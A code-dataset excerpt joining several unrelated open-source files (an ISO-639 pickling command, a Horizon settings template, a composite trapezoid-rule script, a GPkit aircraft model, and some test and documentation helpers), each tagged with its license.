src = self.j(self.d(self.SRC), 'setup', 'iso_639')
if not os.path.exists(src):
raise Exception(src + ' does not exist')
dest = self.DEST
if not self.newer(dest, [src, __file__]):
self.info('Pickled code is up to date')
return
self.info('Pickling ISO-639 codes to', dest)
from lxml import etree
root = etree.fromstring(open(self.j(src, 'iso_639_3.xml'), 'rb').read())
by_2 = {}
by_3b = {}
by_3t = {}
m2to3 = {}
m3to2 = {}
m3bto3t = {}
nm = {}
codes2, codes3t, codes3b = set(), set(), set()
for x in root.xpath('//iso_639_3_entry'):
two = x.get('part1_code', None)
threet = x.get('id')
threeb = x.get('part2_code', None)
if threeb is None:
                # Only recognize languages in ISO-639-2
continue
name = x.get('name')
if two is not None:
by_2[two] = name
codes2.add(two)
m2to3[two] = threet
m3to2[threeb] = m3to2[threet] = two
by_3b[threeb] = name
by_3t[threet] = name
if threeb != threet:
m3bto3t[threeb] = threet
codes3b.add(threeb)
codes3t.add(threet)
base_name = name.lower()
nm[base_name] = threet
from cPickle import dump
x = {'by_2':by_2, 'by_3b':by_3b, 'by_3t':by_3t, 'codes2':codes2,
'codes3b':codes3b, 'codes3t':codes3t, '2to3':m2to3,
'3to2':m3to2, '3bto3t':m3bto3t, 'name_map':nm}
dump(x, open(dest, 'wb'), -1)
def clean(self):
if os.path.exists(self.DEST):
os.remove(self.DEST)
# }}}
| gpl-3.0 | -5,298,192,980,952,734,000 | 34.286567 | 82 | 0.497335 | false |
Martin819/salt-formula-horizon | horizon/files/local_settings/csb_settings.py | 1 | 2058 | import os
from django.utils.translation import ugettext_lazy as _
from openstack_dashboard import exceptions
{%- from "horizon/map.jinja" import server with context %}
{%- set app = salt['pillar.get']('horizon:server:app:'+app_name) %}
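# The values below are rendered from the per-application pillar data when Salt compiles this template.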
HORIZON_CONFIG = {
'dashboards': ({% if app.plugin is defined %}{% for plugin_name, plugin in app.plugin.iteritems() %}{% if plugin.get('dashboard', False) %}'{{ plugin_name }}', {% endif %}{% endfor %}{% endif %}'admin', 'settings'),
'default_dashboard': '{{ app.get('default_dashboard', 'project') }}',
'user_home': '{{ app.get('user_home', 'openstack_dashboard.views.get_user_home') }}',
'ajax_queue_limit': 10,
'auto_fade_alerts': {
'delay': 3000,
'fade_duration': 1500,
'types': ['alert-success', 'alert-info']
},
'help_url': "{{ app.get('help_url', 'http://docs.openstack.org') }}",
'exceptions': {'recoverable': exceptions.RECOVERABLE,
'not_found': exceptions.NOT_FOUND,
'unauthorized': exceptions.UNAUTHORIZED},
}
INSTALLED_APPS = (
{%- for plugin_name, plugin in app.plugin.iteritems() %}
'{{ plugin.app }}',
{%- endfor %}
'csb_dashboard',
'csb_dashboard.dashboards.service',
'csb_dashboard.dashboards.admin',
'csb_dashboard.dashboards.api_office365',
'csb_dashboard.dashboards.heat_stack',
'csb_dashboard.dashboards.salt_cloud',
'csb_dashboard.dashboards.salt_system',
'theme',
'horizon_overrides',
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'compressor',
'horizon',
'csbclient',
'csb_auth',
'markitup',
'image_proxy',
{%- if app.logging is defined %}
'raven.contrib.django.raven_compat',
{%- endif %}
)
MEDIA_ROOT = '/srv/horizon/sites/{{ app_name }}/media/'
STATIC_ROOT = '/srv/horizon/sites/{{ app_name }}/static/'
{% include "horizon/files/horizon_settings/_local_settings.py" %} | apache-2.0 | -4,526,805,969,484,877,000 | 35.122807 | 219 | 0.62585 | false |
Alecardv/College-projects | Metodos Numericos 2012/trapecioCompuesto.py | 1 | 1525 | import function
from matplotlib.pyplot import *
from pylab import *
import numpy as np
import math
class TrapecioComp:
def __init__(self, fun, xi, xf,n):
self.fun = function.Function(fun,'x')
self.a,self.b = xi,xf
self.n = n
self.fig, self.ax = subplots()
def relativeError(self):
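        # Composite trapezoid error term E = -(b-a)^3/(12 n^2) * f''(xi); the f'' factor is estimated from a difference quotient of the second derivative.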
f = self.fun.getDerivate(2)
        Ea = ((self.b - self.a)**3 / (12.0 * self.n**2)) * ((f.evalFunction(self.b) - f.evalFunction(self.a)) / (self.b - self.a))
return Ea
def graph(self):
figure()
root = self.method()
print 'AreaAprox = ',root
print 'AreaReal = ',self.fun.getAndEvalIntegral([self.a,self.b])
print 'Error = ',self.relativeError()
Ox = np.arange(self.a-5,self.b+5, 0.02)
Oy = []
for i in Ox:
Oy.append( self.fun.evalFunction(i) )
self.ax.plot(Ox, Oy, color = "blue",lw = 1,label="f(x)")
self.ax.legend(loc=2)
show()
def px(self,a,b,x):
return ((self.fun.evalFunction(b)-self.fun.evalFunction(a))/(b-a))*(x-a) + self.fun.evalFunction(a)
def method(self):
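        # Composite trapezoid rule: I = (b-a) * (f(a) + 2*sum(f(x_i)) + f(b)) / (2n); each panel is also drawn on the axes.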
i=0
S = 0
        dx = float(self.b - self.a) / self.n
for i in range(1,(int(self.n))):
xi = float(self.a+i*dx)
S = 2*(self.fun.evalFunction(xi)) + S
self.ax.vlines(self.a+(i-1)*dx,0,self.fun.evalFunction(self.a+(i-1)*dx))
self.ax.vlines(xi+dx,0,self.fun.evalFunction(xi+dx))
Ox = np.arange(self.a+(i-1)*dx,xi+dx, 0.02)
Oy = []
            for x in Ox:
                Oy.append(self.px(self.a + (i - 1)*dx, xi + dx, x))
self.ax.plot(Ox, Oy,lw = 2)
I = (self.b-self.a)*((self.fun.evalFunction(self.a) + self.fun.evalFunction(self.b) + S )/(2*self.n))
return I
| gpl-3.0 | -3,655,874,263,635,416,000 | 28.326923 | 108 | 0.628852 | false |
convexengineering/gplibrary | gpkitmodels/SP/SimPleAC/SimPleAC_multimission.py | 1 | 3535 | from builtins import range
import numpy as np
from gpkit import Model, Variable, SignomialsEnabled, SignomialEquality, \
VarKey, units, Vectorize, settings
from gpkitmodels.SP.SimPleAC.SimPleAC_mission import Mission, SimPleAC
from gpkitmodels.SP.atmosphere.atmosphere import Atmosphere
# SimPleAC with multimission design (updated 5/31/2019, by Berk Ozturk)
class Multimission(Model):
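    # Couples one SimPleAC aircraft design to several missions; W_{f_{mm}} aggregates the fuel burned across all of them.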
def setup(self,aircraft,Nmissions,Nsegments):
self.aircraft = aircraft
self.missions = []
for i in range(0,Nmissions):
self.missions.append(Mission(self.aircraft,Nsegments))
# Multimission objective variables
W_f_mm = Variable('W_{f_{mm}}','N','multimission fuel weight')
with Vectorize(Nmissions):
# Mission variables
hcruise = Variable('h_{cruise_{mm}}', 'm', 'minimum cruise altitude')
Range = Variable("Range_{mm}", "km", "aircraft range")
W_p = Variable("W_{p_{mm}}", "N", "payload weight", pr=20.)
rho_p = Variable("\\rho_{p_{mm}}", 1500, "kg/m^3", "payload density", pr=10.)
V_min = Variable("V_{min_{mm}}", 25, "m/s", "takeoff speed", pr=20.)
cost_index = Variable("C_{mm}", '1/hr','hourly cost index')
TOfac = Variable('T/O factor_{mm}', 2.,'-','takeoff thrust factor')
constraints = []
# Setting up the missions
for i in range(0,Nmissions):
constraints += [
self.missions[i]['h_{cruise_m}'] == hcruise[i],
self.missions[i]['Range_m'] == Range[i],
self.missions[i]['W_{p_m}'] == W_p[i],
self.missions[i]['\\rho_{p_m}'] == rho_p[i],
self.missions[i]['V_{min_m}'] == V_min[i],
self.missions[i]['C_m'] == cost_index[i],
self.missions[i]['T/O factor_m'] == TOfac[i],
# Upper bounding relevant variables
W_f_mm <= 1e11*units('N'),
]
# Multimission constraints
constraints += [W_f_mm >= sum(self.missions[i]['W_{f_m}'] for i in range(0,Nmissions))]
return constraints, self.aircraft, self.missions
def test():
Nmissions = 2
Nsegments = 4
aircraft = SimPleAC()
m = Multimission(aircraft,Nmissions,Nsegments)
m.substitutions.update({
'h_{cruise_{mm}}':[5000*units('m'), 5000*units('m')],
'Range_{mm}' :[3000*units('km'), 2000*units('km')],
'W_{p_{mm}}' :[6250*units('N'), 8000*units('N')],
'\\rho_{p_{mm}}' :[1500*units('kg/m^3'), 2000*units('kg/m^3')],
'C_{mm}' :[120*units('1/hr'), 360*units('1/hr')],
})
m.cost = (m.missions[0]['W_{f_m}']*units('1/N') + m.missions[1]['C_m']*m.missions[1]['t_m'])
if settings["default_solver"] == "cvxopt":
return
else:
sol = m.localsolve(verbosity=0)
if __name__ == "__main__":
Nmissions = 2
Nsegments = 4
aircraft = SimPleAC()
m = Multimission(aircraft,Nmissions,Nsegments)
m.substitutions.update({
'h_{cruise_{mm}}':[5000*units('m'), 5000*units('m')],
'Range_{mm}' :[3000*units('km'), 2000*units('km')],
'W_{p_{mm}}' :[6250*units('N'), 8000*units('N')],
'\\rho_{p_{mm}}' :[1500*units('kg/m^3'), 2000*units('kg/m^3')],
'C_{mm}' :[120*units('1/hr'), 360*units('1/hr')],
})
m.cost = (m.missions[0]['W_{f_m}']*units('1/N') + m.missions[1]['C_m']*m.missions[1]['t_m'])
sol = m.localsolve(verbosity = 2)
| mit | -2,871,719,499,142,976,000 | 41.083333 | 96 | 0.539745 | false |
whtsky/Waterspout | waterspout/tests/test_auth.py | 1 | 1042 | from waterspout.app import Waterspout
from waterspout.web import RequestHandler
from waterspout.auth import login_required, permission_required
class LoginHandler(RequestHandler):
def get(self):
if not self.session["id"]:
self.session["id"] = 1
else:
self.session["id"] = 2
self.write(".")
class LoginRequireHandler(RequestHandler):
@login_required
def get(self):
self.write('success')
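# The permission check below passes only for users whose loaded id equals 2 (i.e. after a second visit to /).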
admin_require = permission_required(lambda x: x == 2)
class AdminRequireHandler(RequestHandler):
@admin_require
def get(self):
self.write('id==2')
handlers = [
('/', LoginHandler),
('/a', LoginRequireHandler),
('/b', AdminRequireHandler)
]
waterspout = Waterspout(__name__, handlers=handlers,
cookie_secret="..", login_url="/")
@waterspout.user_loader
def load_user(session):
return session["id"]
def test_auth():
client = waterspout.TestClient()
assert client.get('/a').effective_url.endswith("?next=%2Fa")
| mit | -8,224,585,704,073,168,000 | 20.708333 | 64 | 0.639155 | false |
chromium/chromium | third_party/blink/web_tests/external/wpt/docs/wpt_lint_rules.py | 11 | 2635 | from docutils.parsers.rst import Directive, nodes
from docutils.utils import new_document
from recommonmark.parser import CommonMarkParser
import importlib
import textwrap
class WPTLintRules(Directive):
"""A docutils directive to generate documentation for the
    web-platform-tests' linting tool from its source code. Requires a
single argument: a Python module specifier for a file which declares
linting rules."""
has_content = True
required_arguments = 1
optional_arguments = 0
_md_parser = CommonMarkParser()
@staticmethod
def _parse_markdown(markdown):
WPTLintRules._md_parser.parse(markdown, new_document("<string>"))
return WPTLintRules._md_parser.document.children[0]
@property
def module_specifier(self):
return self.arguments[0]
def _get_rules(self):
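        # Import the configured module and yield name/description/to_fix for each concrete rule class that defines a description.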
try:
module = importlib.import_module(self.module_specifier)
except ImportError:
raise ImportError(
"""wpt-lint-rules: unable to resolve the module at "{}".""".format(self.module_specifier)
)
for binding_name, value in module.__dict__.items():
if hasattr(value, "__abstractmethods__") and len(value.__abstractmethods__):
continue
description = getattr(value, "description", None)
name = getattr(value, "name", None)
to_fix = getattr(value, "to_fix", None)
if description is None:
continue
if to_fix is not None:
to_fix = textwrap.dedent(to_fix)
yield {
"name": name,
"description": textwrap.dedent(description),
"to_fix": to_fix
}
def run(self):
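        # Render each rule as a definition-list entry: literal rule name, markdown description and optional "To fix" note.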
definition_list = nodes.definition_list()
for rule in sorted(self._get_rules(), key=lambda rule: rule['name']):
item = nodes.definition_list_item()
definition = nodes.definition()
term = nodes.term()
item += term
item += definition
definition_list += item
term += nodes.literal(text=rule["name"])
definition += WPTLintRules._parse_markdown(rule["description"])
if rule["to_fix"]:
definition += nodes.strong(text="To fix:")
definition += WPTLintRules._parse_markdown(rule["to_fix"])
if len(definition_list.children) == 0:
raise Exception(
"""wpt-lint-rules: no linting rules found at "{}".""".format(self.module_specifier)
)
return [definition_list]
| bsd-3-clause | -4,440,553,942,413,397,000 | 32.782051 | 105 | 0.589374 | false |
crossroadchurch/paul | tests/helpers/songfileimport.py | 1 | 8465 | # -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2015 OpenLP Developers #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
The :mod:`songfileimporthelper` modules provides a helper class and methods to easily enable testing the import of
song files from third party applications.
"""
import json
import logging
from unittest import TestCase
from openlp.plugins.songs.lib.importers.opensong import OpenSongImport
from openlp.core.common import Registry
from tests.functional import patch, MagicMock, call
log = logging.getLogger(__name__)
class SongImportTestHelper(TestCase):
"""
    This class is designed to be a helper class to reduce repetition when testing the import of song files.
"""
def __init__(self, *args, **kwargs):
super(SongImportTestHelper, self).__init__(*args, **kwargs)
self.importer_module = __import__('openlp.plugins.songs.lib.importers.%s' %
self.importer_module_name, fromlist=[self.importer_class_name])
self.importer_class = getattr(self.importer_module, self.importer_class_name)
def setUp(self):
"""
Patch and set up the mocks required.
"""
Registry.create()
self.add_copyright_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.add_copyright' %
(self.importer_module_name, self.importer_class_name))
self.add_verse_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.add_verse' %
(self.importer_module_name, self.importer_class_name))
self.finish_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.finish' %
(self.importer_module_name, self.importer_class_name))
self.add_author_patcher = patch('openlp.plugins.songs.lib.importers.%s.%s.add_author' %
(self.importer_module_name, self.importer_class_name))
self.song_import_patcher = patch('openlp.plugins.songs.lib.importers.%s.SongImport' %
self.importer_module_name)
self.mocked_add_copyright = self.add_copyright_patcher.start()
self.mocked_add_verse = self.add_verse_patcher.start()
self.mocked_finish = self.finish_patcher.start()
self.mocked_add_author = self.add_author_patcher.start()
self.mocked_song_importer = self.song_import_patcher.start()
self.mocked_manager = MagicMock()
self.mocked_import_wizard = MagicMock()
self.mocked_finish.return_value = True
def tearDown(self):
"""
Clean up
"""
self.add_copyright_patcher.stop()
self.add_verse_patcher.stop()
self.finish_patcher.stop()
self.add_author_patcher.stop()
self.song_import_patcher.stop()
def load_external_result_data(self, file_name):
"""
A method to load and return an object containing the song data from an external file.
"""
result_file = open(file_name, 'rb')
return json.loads(result_file.read().decode())
def file_import(self, source_file_name, result_data):
"""
Import the given file and check that it has imported correctly
"""
importer = self.importer_class(self.mocked_manager, filenames=[source_file_name])
importer.import_wizard = self.mocked_import_wizard
importer.stop_import_flag = False
importer.topics = []
# WHEN: Importing the source file
importer.import_source = source_file_name
add_verse_calls = self._get_data(result_data, 'verses')
author_calls = self._get_data(result_data, 'authors')
ccli_number = self._get_data(result_data, 'ccli_number')
comments = self._get_data(result_data, 'comments')
song_book_name = self._get_data(result_data, 'song_book_name')
song_copyright = self._get_data(result_data, 'copyright')
song_number = self._get_data(result_data, 'song_number')
title = self._get_data(result_data, 'title')
topics = self._get_data(result_data, 'topics')
verse_order_list = self._get_data(result_data, 'verse_order_list')
# THEN: do_import should return none, the song data should be as expected, and finish should have been called.
self.assertIsNone(importer.do_import(), 'do_import should return None when it has completed')
# Debug information - will be displayed when the test fails
log.debug("Title imported: %s" % importer.title)
log.debug("Verses imported: %s" % self.mocked_add_verse.mock_calls)
log.debug("Verse order imported: %s" % importer.verse_order_list)
log.debug("Authors imported: %s" % self.mocked_add_author.mock_calls)
log.debug("CCLI No. imported: %s" % importer.ccli_number)
log.debug("Comments imported: %s" % importer.comments)
log.debug("Songbook imported: %s" % importer.song_book_name)
log.debug("Song number imported: %s" % importer.song_number)
log.debug("Song copyright imported: %s" % importer.song_number)
log.debug("Topics imported: %s" % importer.topics)
self.assertEqual(importer.title, title, 'title for %s should be "%s"' % (source_file_name, title))
for author in author_calls:
self.mocked_add_author.assert_any_call(author)
if song_copyright:
self.mocked_add_copyright.assert_called_with(song_copyright)
if ccli_number:
self.assertEqual(importer.ccli_number, ccli_number,
'ccli_number for %s should be %s' % (source_file_name, ccli_number))
expected_calls = []
for verse_text, verse_tag in add_verse_calls:
self.mocked_add_verse.assert_any_call(verse_text, verse_tag)
expected_calls.append(call(verse_text, verse_tag))
self.mocked_add_verse.assert_has_calls(expected_calls, any_order=False)
if topics:
self.assertEqual(importer.topics, topics, 'topics for %s should be %s' % (source_file_name, topics))
if comments:
self.assertEqual(importer.comments, comments,
'comments for %s should be "%s"' % (source_file_name, comments))
if song_book_name:
self.assertEqual(importer.song_book_name, song_book_name,
'song_book_name for %s should be "%s"' % (source_file_name, song_book_name))
if song_number:
self.assertEqual(importer.song_number, song_number,
'song_number for %s should be %s' % (source_file_name, song_number))
if verse_order_list:
self.assertEqual(importer.verse_order_list, verse_order_list,
'verse_order_list for %s should be %s' % (source_file_name, verse_order_list))
self.mocked_finish.assert_called_with()
def _get_data(self, data, key):
if key in data:
return data[key]
return ''
| gpl-2.0 | 1,231,135,504,004,555,800 | 52.917197 | 118 | 0.586297 | false |